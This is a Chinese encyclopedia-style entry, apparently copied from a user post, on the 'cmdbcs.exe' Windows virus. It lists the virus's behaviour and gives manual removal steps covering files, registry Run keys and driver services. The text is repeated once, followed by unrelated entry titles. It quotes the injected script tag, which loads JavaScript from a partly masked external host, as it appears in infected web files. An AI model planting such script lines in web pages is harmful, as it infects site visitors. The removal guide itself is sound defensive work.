“cmdbcs.exe”的意思、由来-中文百科全书

最近电脑突然卡，发现进程了多了很多个cmdbcs.exe

感觉不对，马上从收藏夹里找到在线杀毒http://www.antidu.cn/board/online/ 查杀

果然，瑞星报毒！！！

1.病毒运行后，释放如下副本以及文件：

%systemroot%\\system32\\wxptdi.sys

2.释放一个批处理停止Windows 防火墙服务

3.检测进程中是否存在AVP.exe 如果存在则把时间改为2001年

4.启动一个空壳的wuauclt.exe 把%systemroot%\\system32\\wxptdi.sys（其实和ntuser.com是同一个文件）的代码完全注入进去

5.感染全盘的php jsp asp htm html文件在后面写入<script language=javascript src=http://cc.18d***.net/1.js></script>的代码

6.wuauclt.exe执行下载木马的操作

读取http://*.com/elf_listo.txt的文件列表

下载27个木马和病毒到c:\\Program Files下面分别命名为csrss0.exe～csrss9.exe csrssa.exe～csrsst.exe

清除办法：

下载sreng：http://www.antidu.cn/board/helpst/

1.删除：

%systemroot%\\system32\\drivers\\msconkt.sys

%systemroot%\\system32\\AVPSrv.dll

%systemroot%\\system32\\cmdbcs.dll

%systemroot%\\system32\\DbgHlp32.dll

%systemroot%\\system32\\Kvsc3.dll

%systemroot%\\system32\\LYLOADER.EXE

%systemroot%\\system32\\LYMANGR.DLL

%systemroot%\\system32\\MSDEG32.DLL

%systemroot%\\system32\VDispDrv.dll

%systemroot%\\system32\\REGKEY.hiv

%systemroot%\\system32\\SSLDyn.dll

%systemroot%\\system32\\wxptdi.sys

%systemroot%\\608769L.exe

%systemroot%\\608769M.exe

%systemroot%\\608769MM.DLL

%systemroot%\\608769WL.DLL

%systemroot%\\AVPSrv.exE

%systemroot%\\cmdbcs.exe

%systemroot%\\DbgHlp32.exe

%systemroot%\\Kvsc3.exE

%systemroot%\VDispDRV.EXE

%systemroot%\\SSLDyn.exE

%systemroot%\\system32\\fat32.sys（%systemroot%为环境变量，表示你的系统文件夹安装位置，对于系统盘安装在C盘的XP用户即为%systemroot% 以此类推）

2.重启之后

打开sreng

启动项目注册表删除如下项目

[HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run]

<SSLDyn><%systemroot%\\SSLDyn.exE> []

<cmdbcs><%systemroot%\\cmdbcs.exe> []

<WinSysM><%systemroot%\\608769M.exe> []

<WinSysW><%systemroot%\\608769L.exe> []

<Kvsc3><%systemroot%\\Kvsc3.exE> []

<AVPSrv><%systemroot%\\AVPSrv.exE> []

<NVDispDrv><%systemroot%\\aorwpw.exe> [N/A]

<DbgHlp32><%systemroot%\\DbgHlp32.exe> []

在“启动项目”-“服务”-“驱动程序”中点“隐藏经认证的微软项目”，

选中以下项目，点“删除服务”，再点“设置”，在弹出的框中点“否”：

[RAS Asynchronous Media Driver / AsyncMac][Running/Auto Start]

<system32\\DRIVERS\\msconkt.sys><N/A>（之前的comint32.sys变种）

[RAS Asynchronous Media Driver / CCDEcode][Running/Auto Start]

<system32\\DRIVERS\\msconkt.sys><N/A>

[PciHardDisk / PciHardDisk][Stopped/Manual Start]

<\\??\\%systemroot%\\system32\\fat32.sys><N/A>（机器狗病毒变种）

3.清除机器狗病毒

参考http://www.antidu.cn/html/1/2007/12/antidu_20071217212429.html

解决方法第三点即可

4.清除GD*I32.dll，bj*rl.dll，addr*help.dll木马群

参考http://www.antidu.cn/html/1/2007/12/antidu_20071210194454.html即可

词条	cmdbcs.exe
释义	最近电脑突然卡，发现进程了多了很多个cmdbcs.exe 感觉不对，马上从收藏夹里找到在线杀毒http://www.antidu.cn/board/online/ 查杀果然，瑞星报毒！！！ 1.病毒运行后，释放如下副本以及文件： %systemroot%\\system32\\wxptdi.sys 2.释放一个批处理停止Windows 防火墙服务 3.检测进程中是否存在AVP.exe 如果存在则把时间改为2001年 4.启动一个空壳的wuauclt.exe 把%systemroot%\\system32\\wxptdi.sys（其实和ntuser.com是同一个文件）的代码完全注入进去 5.感染全盘的php jsp asp htm html文件在后面写入<script language=javascript src=http://cc.18d**.net/1.js></script>的代码 6.wuauclt.exe执行下载木马的操作读取http://.com/elf_listo.txt的文件列表下载27个木马和病毒到c:\\Program Files下面分别命名为csrss0.exe～csrss9.exe csrssa.exe～csrsst.exe 清除办法：下载sreng：http://www.antidu.cn/board/helpst/ 1.删除： %systemroot%\\system32\\drivers\\msconkt.sys %systemroot%\\system32\\AVPSrv.dll %systemroot%\\system32\\cmdbcs.dll %systemroot%\\system32\\DbgHlp32.dll %systemroot%\\system32\\Kvsc3.dll %systemroot%\\system32\\LYLOADER.EXE %systemroot%\\system32\\LYMANGR.DLL %systemroot%\\system32\\MSDEG32.DLL %systemroot%\\system32\VDispDrv.dll %systemroot%\\system32\\REGKEY.hiv %systemroot%\\system32\\SSLDyn.dll %systemroot%\\system32\\wxptdi.sys %systemroot%\\608769L.exe %systemroot%\\608769M.exe %systemroot%\\608769MM.DLL %systemroot%\\608769WL.DLL %systemroot%\\AVPSrv.exE %systemroot%\\cmdbcs.exe %systemroot%\\DbgHlp32.exe %systemroot%\\Kvsc3.exE %systemroot%\VDispDRV.EXE %systemroot%\\SSLDyn.exE %systemroot%\\system32\\fat32.sys（%systemroot%为环境变量，表示你的系统文件夹安装位置，对于系统盘安装在C盘的XP用户即为%systemroot% 以此类推） 2.重启之后打开sreng 启动项目注册表删除如下项目 [HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run] <SSLDyn><%systemroot%\\SSLDyn.exE> [] <cmdbcs><%systemroot%\\cmdbcs.exe> [] <WinSysM><%systemroot%\\608769M.exe> [] <WinSysW><%systemroot%\\608769L.exe> [] <Kvsc3><%systemroot%\\Kvsc3.exE> [] <AVPSrv><%systemroot%\\AVPSrv.exE> [] <NVDispDrv><%systemroot%\\aorwpw.exe> [N/A] <DbgHlp32><%systemroot%\\DbgHlp32.exe> [] 在“启动项目”-“服务”-“驱动程序”中点“隐藏经认证的微软项目”，选中以下项目，点“删除服务”，再点“设置”，在弹出的框中点“否”： [RAS Asynchronous Media Driver / AsyncMac][Running/Auto Start] <system32\\DRIVERS\\msconkt.sys><N/A>（之前的comint32.sys变种） [RAS Asynchronous Media Driver / CCDEcode][Running/Auto Start] <system32\\DRIVERS\\msconkt.sys><N/A> [PciHardDisk / PciHardDisk][Stopped/Manual Start] <\\??\\%systemroot%\\system32\\fat32.sys><N/A>（机器狗病毒变种） 3.清除机器狗病毒参考http://www.antidu.cn/html/1/2007/12/antidu_20071217212429.html 解决方法第三点即可 4.清除GDI32.dll，bjrl.dll，addr*help.dll木马群参考http://www.antidu.cn/html/1/2007/12/antidu_20071210194454.html即可
随便看	松山塘围垦松山头自然村松山西社区松山小区松山腰村松山一组村松山伊织松山峪小学松山运动松山战斗松山庄松上集团松梢小卷蛾松梢小卷叶蛾松稍螟松蛇属松生等松盛大厦松师犬松狮俱乐部松狮犬：王者之风松狮熊猫装松十二齿小蠹松石高速公路松石灵芝图轴